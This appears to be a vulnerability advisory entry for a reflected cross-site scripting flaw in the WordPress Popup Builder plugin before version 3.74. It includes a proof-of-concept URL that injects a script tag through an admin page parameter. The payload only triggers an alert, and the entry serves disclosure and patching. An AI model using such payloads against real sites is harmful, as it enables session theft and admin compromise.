Lucene search
Nguyen Anh TienWPVDB-ID:597E9686-F4E2-43BF-85EF-C5967E5652BDHistoryFeb 02, 2021 - 12:00 a.m.
Popup Builder < 3.74 - Authenticated Reflected Cross-Site Scripting (XSS)
2021-02-0200:00:00
Nguyen Anh Tien
wpscan.com
12
The βAll Subscribersβ setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.
PoC
http://example.com/wp-admin/edit.php?post_type=popupbuilder&page;=sgpbSubscribers&sgpb-subscribers-date;="><script>alert(origin)<%2Fscript> Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg
| CPE | Name | Operator | Version |
|---|---|---|---|
| popup-builder | lt | 3.74 |
Related
prion
prion
Cross site scripting
2021-04-05 19:15:00
cve
cve
CVE-2021-24152
2021-04-05 19:15:00
wpexploit
wpexploit
Popup Builder < 3.74 - Authenticated Reflected Cross-Site Scripting (XSS)
2021-02-02 00:00:00
Related for WPVDB-ID:597E9686-F4E2-43BF-85EF-C5967E5652BD